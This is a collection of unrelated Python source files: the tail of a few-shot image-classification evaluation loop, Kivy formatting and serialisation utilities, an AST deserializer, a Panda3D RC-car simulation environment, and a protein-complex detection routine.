            sample_dataloader = tg.get_mini_imagenet_data_loader(task, num_per_class=SAMPLE_NUM_PER_CLASS,
                                                                 split="train", shuffle=False)
            num_per_class = 5
            test_dataloader = tg.get_mini_imagenet_data_loader(task, num_per_class=num_per_class, split="test",
                                                               shuffle=False)
            # BUG FIX: `.__iter__().next()` is Python-2-only syntax; use the
            # builtin next() on Python 3.
            sample_images, sample_labels = next(iter(sample_dataloader))
            for test_images, test_labels in test_dataloader:
                batch_size = test_labels.shape[0]
                # calculate features (shape comments assume 5-way 5-shot)
                sample_features = feature_encoder(Variable(sample_images).cuda(GPU))  # [25, 64, 19, 19]
                sample_features = sample_features.view(CLASS_NUM, SAMPLE_NUM_PER_CLASS, FEATURE_DIM, 19, 19)
                # Sum the K shots of each class into one class prototype.
                sample_features = torch.sum(sample_features, 1).squeeze(1)  # [5, 64, 19, 19]
                test_features = feature_encoder(Variable(test_images).cuda(GPU))
                # each batch sample link to every samples to calculate relations
                sample_features_ext = sample_features.unsqueeze(0).repeat(batch_size, 1, 1, 1, 1)
                test_features_ext = test_features.unsqueeze(0).repeat(1 * CLASS_NUM, 1, 1, 1, 1)
                test_features_ext = torch.transpose(test_features_ext, 0, 1)
                relation_pairs = torch.cat((sample_features_ext, test_features_ext), 2)
                relation_pairs = relation_pairs.view(-1, FEATURE_DIM * 2, 19, 19)
                relations = relation_network(relation_pairs)
                relations = relations.view(-1, CLASS_NUM)
                _, predict_labels = torch.max(relations.data, 1)
                # BUG FIX: removed leftover debugging prints and an exit()
                # call that aborted evaluation after the first batch, leaving
                # the accuracy computation below unreachable.
                test_labels = test_labels.cuda(GPU)
                rewards = [1 if predict_labels[j] == test_labels[j] else 0 for j in range(batch_size)]
                total_rewards += np.sum(rewards)
            accuracy = total_rewards / 1.0 / CLASS_NUM / 15
            accuracies.append(accuracy)
        test_accuracy, h = mean_confidence_interval(accuracies)
        print("test accuracy:{:.4f}\th:{:.3f}".format(test_accuracy, h))
        total_accuracy += test_accuracy
    print("aver_accuracy: {:.4f}".format(total_accuracy / EPISODE))
if __name__ == '__main__':
    # Entry point: run the full evaluation loop.
    main()
|
'''Utilities
=============
'''
from kivy.compat import PY2
from kivy.utils import get_color_from_hex
from kivy.properties import StringProperty, ObservableDict, ObservableList
from kivy.factory import Factory
from kivy.event import EventDispatcher
from kivy.weakproxy import WeakProxy
import json
from io import StringIO
from ruamel.yaml import YAML, SafeRepresenter
__all__ = ('pretty_time', 'pretty_space', 'byteify', 'json_dumps',
'json_loads', 'ColorTheme', 'apply_args_post')
SafeRepresenter.add_representer(ObservableList, SafeRepresenter.represent_list)
SafeRepresenter.add_representer(ObservableDict, SafeRepresenter.represent_dict)
def pretty_time(seconds):
    '''Format a duration in seconds as ``[h:][m:]s.tenths``.

    :Parameters:

        `seconds`: float, int
            The duration, in seconds, to format.

    :returns:
        String representation of the time, with tenth-of-a-second
        resolution and no zero padding.

    For example::

        >>> pretty_time(36574)
        '10:9:34.0'
    '''
    # Work in tenths of a second so the fractional digit is exact.
    tenths = int(seconds * 10)
    whole_seconds, ms = divmod(tenths, 10)
    total_minutes, s = divmod(whole_seconds, 60)
    h, m = divmod(total_minutes, 60)
    if h:
        return '{0:d}:{1:d}:{2:d}.{3:d}'.format(h, m, s, ms)
    if m:
        return '{0:d}:{1:d}.{2:d}'.format(m, s, ms)
    return '{0:d}.{1:d}'.format(s, ms)
def pretty_space(space, is_rate=False):
    '''Format a byte count (or byte rate) with a human-readable unit.

    :Parameters:

        `space`: float, int
            The number of bytes to format.
        `is_rate`: bool
            When True, append ``/s`` to express a rate. Defaults to False.

    :returns:
        String representation, e.g. ``'9.32 GB'`` or ``'9.32 GB/s'``.
    '''
    suffix = '/s' if is_rate else ''
    value = space
    # Step up through the units until the value fits below 1024.
    for unit in ['bytes', 'KB', 'MB', 'GB']:
        if value < 1024.0:
            return "%3.2f %s%s" % (value, unit, suffix)
        value /= 1024.0
    return "%3.2f %s%s" % (value, 'TB', suffix)
def byteify(val, py2_only=True):
    '''Returns a copy of the input with all strings in the input converted to
    bytes.

    :Parameters:

        `val`: object
            The object to convert.
        `py2_only`: bool
            If the conversion should happen in Python 2.x only. If False,
            it's always converted. If True, the default, it's only converted to
            bytes when running in Python 2.

    For example in python 2::

        >>> obj = {u'cheese': u'crackers', 4: [u'four', u'apple', 5, \
'cheeses']}
        >>> obj
        {u'cheese': u'crackers', 4: [u'four', u'apple', 5, 'cheeses']}
        >>> byteify(obj)
        {'cheese': 'crackers', 4: ['four', 'apple', 5, 'cheeses']}
    '''
    if not PY2 and py2_only:
        return val
    # BUG FIX: `unicode` only exists on Python 2; referencing it bare raised
    # NameError when called with py2_only=False on Python 3.
    text_type = unicode if PY2 else str  # noqa: F821
    if isinstance(val, dict):
        # BUG FIX: recursive calls now propagate py2_only; they previously
        # used the default (True), skipping nested conversion on Python 3.
        return {byteify(key, py2_only): byteify(value, py2_only)
                for key, value in val.items()}
    elif isinstance(val, list):
        return [byteify(element, py2_only) for element in val]
    elif isinstance(val, text_type):
        return val.encode('utf-8')
    else:
        return val
def unicodify(val, py3_only=False):
    '''Returns a copy of the input with all byte strings decoded to text
    (the inverse of :func:`byteify`).

    :Parameters:

        `val`: object
            The object to convert.
        `py3_only`: bool
            When True, skip conversion under Python 2.
    '''
    if PY2 and py3_only:
        return val
    # bytes are disjoint from dict/list, so branch order doesn't matter.
    if isinstance(val, bytes):
        return val.decode('utf-8')
    if isinstance(val, dict):
        return {unicodify(k): unicodify(v) for k, v in val.items()}
    if isinstance(val, list):
        return [unicodify(item) for item in val]
    return val
def json_dumps(value):
    """Serialize *value* to a stable, human-readable JSON string."""
    return json.dumps(
        value,
        sort_keys=True,
        indent=4,
        separators=(',', ': '),
    )
def json_loads(value):
    """Parse a JSON string, byteifying the result on Python 2."""
    return byteify(json.loads(value), True)
def _get_yaml():
    """Return a YAML processor configured for safe (de)serialization."""
    return YAML(typ='safe')
def yaml_dumps(value):
    """Serialize *value* to a YAML string using the safe processor."""
    stream = StringIO()
    yaml = _get_yaml()
    yaml.preserve_quotes = True
    yaml.dump(value, stream)
    return stream.getvalue()
def yaml_loads(value):
    """Parse a YAML document from *value* using the safe processor."""
    return _get_yaml().load(value)
class ColorTheme(EventDispatcher):
    '''Default values from https://www.materialpalette.com/amber/indigo

    Colors are stored as RGBA lists converted from 8-digit hex (RRGGBBAA).
    '''
    primary_dark = StringProperty(get_color_from_hex('FFA000FF'))
    primary = StringProperty(get_color_from_hex('FFC107FF'))
    primary_light = StringProperty(get_color_from_hex('FFECB3FF'))
    primary_text = StringProperty(get_color_from_hex('FFFFFFFF'))
    # NOTE(review): stray attribute docstring below — appears to be a leftover.
    '''This is different.
    '''
    accent = StringProperty(get_color_from_hex('536DFEFF'))
    text_primary = StringProperty(get_color_from_hex('212121FF'))
    text_secondary = StringProperty(get_color_from_hex('757575FF'))
    divider = StringProperty(get_color_from_hex('BDBDBDFF'))
    @staticmethod
    def interpolate(color1, color2, fraction):
        """Linearly blend two colors; each channel is clamped to [0, 1]."""
        color = []
        for c1, c2 in zip(color1, color2):
            c = min(max((c2 - c1) * fraction + c1, 0), 1)
            color.append(c)
        return color
class KVBehavior(object):
    """Empty marker base class, registered with Kivy's Factory for KV files."""
def apply_args_post(cls, **keywordargs):
    """Return a factory that builds a *cls* instance, then applies attributes.

    The returned callable forwards all of its arguments to ``cls`` and
    afterwards sets each entry of *keywordargs* on the new instance via
    ``setattr``, finally returning the instance.
    """
    def factory(*args, **kwargs):
        instance = cls(*args, **kwargs)
        for name, value in keywordargs.items():
            setattr(instance, name, value)
        return instance
    return factory
# Register the theme and behavior classes with Kivy's Factory so they can
# be referenced by name from KV language files.
Factory.register(classname='ColorTheme', cls=ColorTheme)
Factory.register(classname='KVBehavior', cls=KVBehavior)
|
<filename>python/utir/deserializer/__init__.py<gh_stars>1-10
from utir import ast
from utir.exception import InvalidFileFormatError
class ASTDeserializer:
    """Rebuild ``utir.ast`` node trees from their plain-dict serialization.

    The serialized form is a dict whose single node-type key ('File',
    'FunctionDef', ...) maps to that node's fields.
    """

    def deserialize(self, object):
        """Deserialize a top-level document dict into an AST.

        Raises:
            InvalidFileFormatError: if the 'Version' key is missing or the
                version is not one this deserializer supports (only 0).
        """
        if 'Version' not in object:
            # BUGFIX: error message previously read "dose not exist".
            raise InvalidFileFormatError("Key of 'Version' does not exist.")
        if object['Version'] == 0:
            return self._deserialize_object(object)
        raise InvalidFileFormatError(
            "Unsupported Version %s" % object['Version'])

    def _deserialize_object(self, object):
        """Recursively convert one serialized node dict into an AST node.

        Returns None for dicts containing no recognized node-type key
        (preserving the original fall-through behaviour).
        """
        if 'File' in object:
            obj = object['File']
            return ast.File(
                [self._deserialize_object(i) for i in obj['Body']])
        if 'FunctionDef' in object:
            obj = object['FunctionDef']
            return ast.FunctionDef(
                obj['Name'],
                [self._deserialize_object(i) for i in obj['Args']],
                [self._deserialize_object(i) for i in obj['Body']])
        if 'ClassDef' in object:
            obj = object['ClassDef']
            return ast.ClassDef(
                obj['Name'],
                obj['Bases'],
                [self._deserialize_object(i) for i in obj['Fields']],
                [self._deserialize_object(i) for i in obj['Body']])
        if 'Return' in object:
            obj = object['Return']
            return ast.Return(self._deserialize_object(obj['Value']))
        if 'Assign' in object:
            obj = object['Assign']
            return ast.Assign(
                self._deserialize_object(obj['Target']),
                self._deserialize_object(obj['Value']))
        if 'For' in object:
            obj = object['For']
            return ast.For(
                self._deserialize_object(obj['Value']),
                self._deserialize_object(obj['Generator']),
                [self._deserialize_object(i) for i in obj['Body']])
        if 'Block' in object:
            obj = object['Block']
            return ast.Block(
                [self._deserialize_object(i) for i in obj['Body']])
        if 'Try' in object:
            obj = object['Try']
            return ast.Try(
                [self._deserialize_object(i) for i in obj['Body']])
        if 'Raise' in object:
            obj = object['Raise']
            return ast.Raise(self._deserialize_object(obj['Value']))
        if 'Catch' in object:
            obj = object['Catch']
            return ast.Catch(
                [self._deserialize_object(i) for i in obj['Body']])
        if 'BoolOp' in object:
            obj = object['BoolOp']
            return ast.BoolOp(
                obj['Kind'],
                self._deserialize_object(obj['Left']),
                self._deserialize_object(obj['Right']))
        if 'BinOp' in object:
            obj = object['BinOp']
            return ast.BinOp(
                obj['Kind'],
                self._deserialize_object(obj['Left']),
                self._deserialize_object(obj['Right']))
        if 'UnaryOp' in object:
            obj = object['UnaryOp']
            return ast.UnaryOp(
                obj['Kind'], self._deserialize_object(obj['Value']))
        if 'Constant' in object:
            obj = object['Constant']
            return ast.Constant(obj['Kind'], obj['Value'])
        if 'Attribute' in object:
            obj = object['Attribute']
            return ast.Attribute(
                self._deserialize_object(obj['Value']), obj['Attribute'])
        if 'Subscript' in object:
            obj = object['Subscript']
            return ast.Subscript(
                self._deserialize_object(obj['Value']),
                self._deserialize_object(obj['Index']))
        if 'Name' in object:
            obj = object['Name']
            return ast.Name(obj['Name'], obj['Kind'])
        if 'Array' in object:
            obj = object['Array']
            return ast.Array(
                [self._deserialize_object(i) for i in obj['Values']])
        if 'Tuple' in object:
            obj = object['Tuple']
            return ast.Tuple(
                [self._deserialize_object(i) for i in obj['Values']])
        if 'Call' in object:
            obj = object['Call']
            return ast.Call(
                self._deserialize_object(obj['Value']),
                [self._deserialize_object(i) for i in obj['Args']],
                [self._deserialize_object(i) for i in obj['KwArgs']])
        if 'ArgumentDef' in object:
            obj = object['ArgumentDef']
            # A None default stays None; anything else is itself a node.
            return ast.ArgumentDef(
                obj['Key'],
                obj['Default'] if obj['Default'] is None
                else self._deserialize_object(obj['Default']))
        if 'KwArg' in object:
            obj = object['KwArg']
            return ast.KwArg(
                obj['Key'], self._deserialize_object(obj['Value']))
|
<gh_stars>100-1000
import time
import numpy as np
import sys
from sandbox.gkahn.gcg.envs.rccar.panda3d_camera_sensor import Panda3dCameraSensor
from direct.showbase.DirectObject import DirectObject
from direct.showbase.ShowBase import ShowBase
from panda3d.core import loadPrcFileData
from panda3d.core import AmbientLight
from panda3d.core import DirectionalLight
from panda3d.core import Vec3
from panda3d.core import Vec4
from panda3d.core import Point3
from panda3d.core import TransformState
from panda3d.core import BitMask32
from panda3d.bullet import BulletWorld
from panda3d.bullet import BulletBoxShape
from panda3d.bullet import BulletPlaneShape
from panda3d.bullet import BulletRigidBodyNode
from panda3d.bullet import BulletVehicle
from panda3d.bullet import BulletHelper
from panda3d.bullet import BulletRigidBodyNode
from panda3d.bullet import ZUp
class CarEnv(DirectObject):
    """Bullet-physics RC-car simulation environment (Panda3D).

    Provides a gym-like ``reset``/``step`` interface plus interactive
    keyboard control when run as a task.  Observations come from one (or
    two) camera sensors mounted on the vehicle.
    """

    def __init__(self, params=None):
        # BUGFIX: the original used a mutable default ``params={}`` which
        # is shared between instances; use None as the sentinel instead.
        if params is None:
            params = {}
        self._params = params
        if 'random_seed' in self._params:
            np.random.seed(self._params['random_seed'])
        self._use_vel = self._params.get('use_vel', True)
        self._run_as_task = self._params.get('run_as_task', False)
        self._do_back_up = self._params.get('do_back_up', False)
        self._use_depth = self._params.get('use_depth', False)
        self._use_back_cam = self._params.get('use_back_cam', False)
        self._collision_reward = self._params.get('collision_reward', 0.)
        if not self._params.get('visualize', False):
            loadPrcFileData('', 'window-type offscreen')

        # Defines the Panda3D globals base, render, loader.
        try:
            ShowBase()
        except Exception:
            # ShowBase is a singleton; instantiating it twice raises.
            pass

        base.setBackgroundColor(0.0, 0.0, 0.0, 1)

        # World
        self._worldNP = render.attachNewNode('World')
        self._world = BulletWorld()
        self._world.setGravity(Vec3(0, 0, -9.81))
        self._dt = params.get('dt', 0.25)       # control interval (s)
        self._step = 0.05                       # physics sub-step (s)

        # Vehicle chassis + rigid body
        shape = BulletBoxShape(Vec3(0.6, 1.0, 0.25))
        ts = TransformState.makePos(Point3(0., 0., 0.25))
        self._vehicle_node = BulletRigidBodyNode('Vehicle')
        self._vehicle_node.addShape(shape, ts)
        self._mass = self._params.get('mass', 10.)
        self._vehicle_node.setMass(self._mass)
        self._vehicle_node.setDeactivationEnabled(False)
        self._vehicle_node.setCcdSweptSphereRadius(1.0)
        self._vehicle_node.setCcdMotionThreshold(1e-7)
        self._vehicle_pointer = self._worldNP.attachNewNode(self._vehicle_node)
        self._world.attachRigidBody(self._vehicle_node)
        self._vehicle = BulletVehicle(self._world, self._vehicle_node)
        self._vehicle.setCoordinateSystem(ZUp)
        self._world.attachVehicle(self._vehicle)
        # Two steered front wheels, two fixed rear wheels.
        self._addWheel(Point3(0.3, 0.5, 0.07), True, 0.07)
        self._addWheel(Point3(-0.3, 0.5, 0.07), True, 0.07)
        self._addWheel(Point3(0.3, -0.5, 0.07), False, 0.07)
        self._addWheel(Point3(-0.3, -0.5, 0.07), False, 0.07)

        # Camera sensor(s)
        size = self._params.get('size', [160, 90])
        hfov = self._params.get('hfov', 60)
        near_far = self._params.get('near_far', [0.1, 100.])
        self._camera_sensor = Panda3dCameraSensor(
            base,
            color=not self._use_depth,
            depth=self._use_depth,
            size=size,
            hfov=hfov,
            near_far=near_far,
            title='front cam')
        self._camera_node = self._camera_sensor.cam
        self._camera_node.setPos(0.0, 0.5, 0.375)
        self._camera_node.lookAt(0.0, 6.0, 0.0)
        self._camera_node.reparentTo(self._vehicle_pointer)
        if self._use_back_cam:
            self._back_camera_sensor = Panda3dCameraSensor(
                base,
                color=not self._use_depth,
                depth=self._use_depth,
                size=size,
                hfov=hfov,
                near_far=near_far,
                title='back cam')
            self._back_camera_node = self._back_camera_sensor.cam
            self._back_camera_node.setPos(0.0, -0.5, 0.375)
            self._back_camera_node.lookAt(0.0, -6.0, 0.0)
            self._back_camera_node.reparentTo(self._vehicle_pointer)

        # Car Simulator
        self._des_vel = None
        self._setup()

        # Keyboard input bindings
        self.accept('escape', self._doExit)
        self.accept('r', self.reset)
        self.accept('f1', self._toggleWireframe)
        self.accept('f2', self._toggleTexture)
        self.accept('f3', self._view_image)
        self.accept('f5', self._doScreenshot)
        self.accept('q', self._forward_0)
        self.accept('w', self._forward_1)
        self.accept('e', self._forward_2)
        self.accept('a', self._left)
        self.accept('s', self._stop)
        self.accept('x', self._backward)
        self.accept('d', self._right)
        self.accept('m', self._mark)

        # Control state (PD velocity controller)
        self._steering = 0.0  # degree
        self._engineForce = 0.0
        self._brakeForce = 0.0
        self._p = self._params.get('p', 1.25)
        self._d = self._params.get('d', 0.0)
        self._last_err = 0.0
        self._curr_time = 0.0
        self._accelClamp = self._params.get('accelClamp', 2.0)
        self._engineClamp = self._accelClamp * self._mass
        self._collision = False
        if self._run_as_task:
            self._mark_d = 0.0
            taskMgr.add(self._update_task, 'updateWorld')
            base.run()

    # _____HANDLER_____

    def _doExit(self):
        sys.exit(1)

    def _toggleWireframe(self):
        base.toggleWireframe()

    def _toggleTexture(self):
        base.toggleTexture()

    def _doScreenshot(self):
        base.screenshot('Bullet')

    def _forward_0(self):
        self._des_vel = 1
        self._brakeForce = 0.0

    def _forward_1(self):
        self._des_vel = 2
        self._brakeForce = 0.0

    def _forward_2(self):
        self._des_vel = 4
        self._brakeForce = 0.0

    def _stop(self):
        self._des_vel = 0.0
        self._brakeForce = 0.0

    def _backward(self):
        self._des_vel = -4
        self._brakeForce = 0.0

    def _right(self):
        # Decrease steering by 5 degrees; clamp to [-30, 0].
        self._steering = np.min([np.max([-30, self._steering - 5]), 0.0])

    def _left(self):
        # Increase steering by 5 degrees; clamp to [0, 30].
        self._steering = np.max([np.min([30, self._steering + 5]), 0.0])

    def _view_image(self):
        """Debug helper: show the current camera frame with matplotlib."""
        from matplotlib import pyplot as plt
        image = self._camera_sensor.observe()[0]
        if self._use_depth:
            plt.imshow(image[:, :, 0], cmap='gray')
        else:
            import cv2

            def rgb2gray(rgb):
                return np.dot(rgb[..., :3], [0.299, 0.587, 0.114])

            image = rgb2gray(image)
            im = cv2.resize(image, (64, 36), interpolation=cv2.INTER_AREA)  # TODO how does this deal with aspect ratio
            plt.imshow(im.astype(np.uint8), cmap='Greys_r')
        plt.show()

    def _mark(self):
        # Reset the odometer used by run-as-task debugging output.
        self._mark_d = 0.0

    # Setup

    def _setup(self):
        """Build the static world (model or flat ground), place the car."""
        if hasattr(self, '_model_path'):
            # Collidable objects loaded from a model file.
            visNP = loader.loadModel(self._model_path)
            visNP.clearModelNodes()
            visNP.reparentTo(render)
            pos = (0., 0., 0.)
            visNP.setPos(pos[0], pos[1], pos[2])
            bodyNPs = BulletHelper.fromCollisionSolids(visNP, True)
            for bodyNP in bodyNPs:
                bodyNP.reparentTo(render)
                bodyNP.setPos(pos[0], pos[1], pos[2])
                if isinstance(bodyNP.node(), BulletRigidBodyNode):
                    bodyNP.node().setMass(0.0)
                    bodyNP.node().setKinematic(True)
                    bodyNP.setCollideMask(BitMask32.allOn())
                    self._world.attachRigidBody(bodyNP.node())
        else:
            # No model: an infinite static ground plane.
            ground = self._worldNP.attachNewNode(BulletRigidBodyNode('Ground'))
            shape = BulletPlaneShape(Vec3(0, 0, 1), 0)
            ground.node().addShape(shape)
            ground.setCollideMask(BitMask32.allOn())
            self._world.attachRigidBody(ground.node())
        self._place_vehicle()
        self._setup_light()
        self._setup_restart_pos()

    def _setup_restart_pos(self):
        """Precompute the list of (pos+hpr) restart poses from params."""
        self._restart_pos = []
        self._restart_index = 0
        if self._params.get('position_ranges', None) is not None:
            ranges = self._params['position_ranges']
            num_pos = self._params['num_pos']
            if self._params.get('range_type', 'random') == 'random':
                for _ in range(num_pos):
                    ran = ranges[np.random.randint(len(ranges))]
                    self._restart_pos.append(np.random.uniform(ran[0], ran[1]))
            elif self._params['range_type'] == 'fix_spacing':
                num_ran = len(ranges)
                num_per_ran = num_pos // num_ran
                for i in range(num_ran):
                    ran = ranges[i]
                    low = np.array(ran[0])
                    diff = np.array(ran[1]) - np.array(ran[0])
                    for j in range(num_per_ran):
                        val = diff * ((j + 0.0) / num_per_ran) + low
                        self._restart_pos.append(val)
        elif self._params.get('positions', None) is not None:
            self._restart_pos = self._params['positions']
        else:
            self._restart_pos = self._default_restart_pos()

    def _next_restart_pos_hpr(self):
        """Return the next restart (pos, hpr) in round-robin order."""
        num = len(self._restart_pos)
        if num == 0:
            return None, None
        else:
            pos_hpr = self._restart_pos[self._restart_index]
            self._restart_index = (self._restart_index + 1) % num
            return pos_hpr[:3], pos_hpr[3:]

    def _next_random_restart_pos_hpr(self):
        """Return a uniformly random restart (pos, hpr)."""
        num = len(self._restart_pos)
        if num == 0:
            return None, None
        else:
            index = np.random.randint(num)
            pos_hpr = self._restart_pos[index]
            self._restart_index = (self._restart_index + 1) % num
            return pos_hpr[:3], pos_hpr[3:]

    def _setup_light(self):
        alight = AmbientLight('ambientLight')
        alight.setColor(Vec4(0.5, 0.5, 0.5, 1))
        alightNP = render.attachNewNode(alight)
        render.clearLight()
        render.setLight(alightNP)

    # Vehicle

    def _default_pos(self):
        return (0.0, 0.0, 0.3)

    def _default_hpr(self):
        return (0.0, 0.0, 3.14)

    def _default_restart_pos(self):
        # BUGFIX: the original signature was ``def _default_restart_pos():``
        # (missing ``self``) yet the body used ``self``, so any call via
        # ``self._default_restart_pos()`` raised a TypeError.
        return [self._default_pos() + self._default_hpr()]

    def _get_speed(self):
        # km/h -> m/s
        vel = self._vehicle.getCurrentSpeedKmHour() / 3.6
        return vel

    def _update(self, dt=1.0, coll_check=True):
        """Advance physics by *dt* seconds using the PD velocity controller."""
        self._vehicle.setSteeringValue(self._steering, 0)
        self._vehicle.setSteeringValue(self._steering, 1)
        self._vehicle.setBrake(self._brakeForce, 0)
        self._vehicle.setBrake(self._brakeForce, 1)
        self._vehicle.setBrake(self._brakeForce, 2)
        self._vehicle.setBrake(self._brakeForce, 3)
        if dt >= self._step:
            # TODO maybe change number of timesteps
            for i in range(int(dt / self._step)):
                if self._des_vel is not None:
                    vel = self._get_speed()
                    err = self._des_vel - vel
                    d_err = (err - self._last_err) / self._step
                    self._last_err = err
                    self._engineForce = np.clip(
                        self._p * err + self._d * d_err,
                        -self._accelClamp, self._accelClamp) * self._mass
                self._vehicle.applyEngineForce(self._engineForce, 0)
                self._vehicle.applyEngineForce(self._engineForce, 1)
                self._vehicle.applyEngineForce(self._engineForce, 2)
                self._vehicle.applyEngineForce(self._engineForce, 3)
                self._world.doPhysics(self._step, 1, self._step)
                self._collision = self._is_contact()
        elif self._run_as_task:
            # Interactive mode: accumulate wall time until a control tick.
            self._curr_time += dt
            if self._curr_time > 0.05:
                if self._des_vel is not None:
                    vel = self._get_speed()
                    self._mark_d += vel * self._curr_time
                    print(vel, self._mark_d, self._is_contact())
                    err = self._des_vel - vel
                    d_err = (err - self._last_err) / 0.05
                    self._last_err = err
                    self._engineForce = np.clip(
                        self._p * err + self._d * d_err,
                        -self._accelClamp, self._accelClamp) * self._mass
                self._curr_time = 0.0
            self._vehicle.applyEngineForce(self._engineForce, 0)
            self._vehicle.applyEngineForce(self._engineForce, 1)
            self._vehicle.applyEngineForce(self._engineForce, 2)
            self._vehicle.applyEngineForce(self._engineForce, 3)
            self._world.doPhysics(dt, 1, dt)
            self._collision = self._is_contact()
        else:
            raise ValueError("dt {0} s is too small for velocity control".format(dt))

    def _stop_car(self):
        """Zero all controls, velocities and wheel state."""
        self._steering = 0.0
        self._engineForce = 0.0
        self._vehicle.setSteeringValue(0.0, 0)
        self._vehicle.setSteeringValue(0.0, 1)
        self._vehicle.applyEngineForce(0.0, 0)
        self._vehicle.applyEngineForce(0.0, 1)
        self._vehicle.applyEngineForce(0.0, 2)
        self._vehicle.applyEngineForce(0.0, 3)
        if self._des_vel is not None:
            self._des_vel = 0
        self._vehicle_node.setLinearVelocity(Vec3(0.0, 0.0, 0.0))
        self._vehicle_node.setAngularVelocity(Vec3(0.0, 0.0, 0.0))
        for i in range(self._vehicle.getNumWheels()):
            wheel = self._vehicle.getWheel(i)
            wheel.setRotation(0.0)
        self._vehicle_node.clearForces()

    def _place_vehicle(self, pos=None, hpr=None):
        if pos is None:
            pos = self._default_pos()
        if hpr is None:
            hpr = self._default_hpr()
        self._vehicle_pointer.setPos(pos[0], pos[1], pos[2])
        self._vehicle_pointer.setHpr(hpr[0], hpr[1], hpr[2])
        self._stop_car()

    def _addWheel(self, pos, front, radius=0.25):
        wheel = self._vehicle.createWheel()
        wheel.setChassisConnectionPointCs(pos)
        wheel.setFrontWheel(front)
        wheel.setWheelDirectionCs(Vec3(0, 0, -1))
        wheel.setWheelAxleCs(Vec3(1, 0, 0))
        wheel.setWheelRadius(radius)
        wheel.setMaxSuspensionTravelCm(40.0)
        wheel.setSuspensionStiffness(40.0)
        wheel.setWheelsDampingRelaxation(2.3)
        wheel.setWheelsDampingCompression(4.4)
        wheel.setFrictionSlip(1e2)
        wheel.setRollInfluence(0.1)

    # Task

    def _update_task(self, task):
        dt = globalClock.getDt()
        self._update(dt=dt)
        self._get_observation()
        return task.cont

    # Helper functions

    def _get_observation(self):
        """Return front (and optionally back) camera images, concatenated on channels."""
        self._obs = self._camera_sensor.observe()
        observation = []
        observation.append(self._obs[0])
        if self._use_back_cam:
            self._back_obs = self._back_camera_sensor.observe()
            observation.append(self._back_obs[0])
        observation = np.concatenate(observation, axis=2)
        return observation

    def _get_reward(self):
        # Speed is the reward unless colliding.
        reward = self._collision_reward if self._collision else self._get_speed()
        return reward

    def _get_done(self):
        return self._collision

    def _get_info(self):
        info = {}
        info['pos'] = np.array(self._vehicle_pointer.getPos())
        info['hpr'] = np.array(self._vehicle_pointer.getHpr())
        info['vel'] = self._get_speed()
        info['coll'] = self._collision
        return info

    def _back_up(self):
        """Reverse with random steering to escape a collision."""
        assert (self._use_vel)
        back_up_vel = self._params['back_up'].get('vel', -2.0)
        self._des_vel = back_up_vel
        back_up_steer = self._params['back_up'].get('steer', (-5.0, 5.0))
        # TODO
        self._steering = np.random.uniform(*back_up_steer)
        self._brakeForce = 0.
        duration = self._params['back_up'].get('duration', 1.0)
        self._update(dt=duration)
        self._des_vel = 0.0
        self._steering = 0.0
        self._update(dt=duration)
        self._brakeForce = 0.

    def _is_contact(self):
        # Removed an unused local that duplicated this call's result.
        result = self._world.contactTest(self._vehicle_node)
        return result.getNumContacts() > 0

    # Environment functions

    def reset(self, pos=None, hpr=None, hard_reset=False, random_reset=False):
        """Reset the car, either by backing up after a crash or teleporting."""
        if self._do_back_up and not hard_reset and \
                pos is None and hpr is None:
            if self._collision:
                self._back_up()
        else:
            if pos is None and hpr is None:
                if random_reset:
                    pos, hpr = self._next_random_restart_pos_hpr()
                else:
                    pos, hpr = self._next_restart_pos_hpr()
            self._place_vehicle(pos=pos, hpr=hpr)
        self._collision = False
        return self._get_observation()

    def step(self, action):
        """Apply ``action = (steering, velocity-or-throttle)``; advance one dt."""
        self._steering = action[0]
        if action[1] == 0.0:
            self._brakeForce = 1000.
        else:
            self._brakeForce = 0.
        if self._use_vel:
            # Convert from m/s to km/h
            self._des_vel = action[1]
        else:
            self._engineForce = self._engineClamp * \
                ((action[1] - 49.5) / 49.5)
        self._update(dt=self._dt)
        observation = self._get_observation()
        reward = self._get_reward()
        done = self._get_done()
        info = self._get_info()
        return observation, reward, done, info
# Manual test drive: open an on-screen window and hand control to the
# Panda3D task loop (keyboard handlers defined in CarEnv.__init__).
if __name__ == '__main__':
    params = {'visualize': True, 'run_as_task': True}
    env = CarEnv(params)
|
# Author: <NAME> <<EMAIL>>
# A core-attachment based method to detect protein complexes in PPI networks
# <NAME>, Kwoh, Ng (2009)
# http://www.biomedcentral.com/1471-2105/10/169
from collections import defaultdict
from itertools import combinations
import functools
# return average degree and density for a graph
def __graph_stats(graph):
    """Return ``(average degree, density)`` of *graph*.

    *graph* is a dict mapping each vertex to its neighbor set.  Density is
    the average degree divided by ``len(graph) - 1``; callers must pass a
    graph with at least two vertices.
    """
    total_degree = sum(len(neighbors) for neighbors in graph.values())
    avg_deg = total_degree / float(len(graph))
    return avg_deg, avg_deg / (len(graph) - 1)
# return core nodes, given a graph and its average degree
__get_core_nodes = lambda g, avg: set(v for v, n in g.items() if len(n) >= avg)
# return NA score
__NA_score = lambda a, b: float(len(a & b) ** 2) / (len(a) * len(b))
def __core_removal(graph, density_threshold):
    """Recursively split *graph* into dense subgraphs by removing core nodes.

    *graph* is a dict mapping vertices to neighbor sets.  If the graph is
    already dense enough (or a single node), it is returned as-is; otherwise
    its high-degree "core" vertices are removed, the remainder is split into
    connected components, and each component is processed recursively.  The
    core vertices are then re-attached to every resulting subgraph.
    Returns a list of subgraph dicts.  NOTE(review): neighbor sets of the
    input are mutated in place during re-attachment.
    """
    if len(graph) == 1:  # need at least two nodes in the graph...
        return [graph]
    avg_deg, density = __graph_stats(graph)
    if density >= density_threshold:
        return [graph]
    else:
        # find and remove core nodes; create connected subcomponents
        core_nodes = __get_core_nodes(graph, avg_deg)
        result = []
        subgraphs = []
        for v, n in graph.items():
            if v in core_nodes:
                continue
            n = n - core_nodes  # note that we're reassigning n
            # merge v's neighborhood into the first overlapping component
            for s in subgraphs:
                if not n.isdisjoint(s):
                    s |= n
                    break
            else:
                subgraphs.append(n | {v})
        # connected subcomponent joining: components may have become
        # transitively connected by the merges above, so union them.
        i = 0
        while i < len(subgraphs) - 1:
            j = i + 1
            while j < len(subgraphs):
                if not subgraphs[i].isdisjoint(subgraphs[j]):
                    subgraphs[i] |= subgraphs[j]
                    subgraphs.pop(j)
                else:
                    j += 1
            i += 1
        # recursive core removal on each induced component
        for s in subgraphs:
            tresults = __core_removal(
                dict((v, graph[v] & s) for v in s), density_threshold
            )
            for tc in tresults:
                # re-attach the removed core vertices to this subgraph
                nodes = set()
                for v, n in tc.items():
                    nodes.add(v)
                    n |= graph[v] & core_nodes
                for c in core_nodes:
                    tc[c] = graph[c] & (nodes | core_nodes)
            result += tresults
        return result
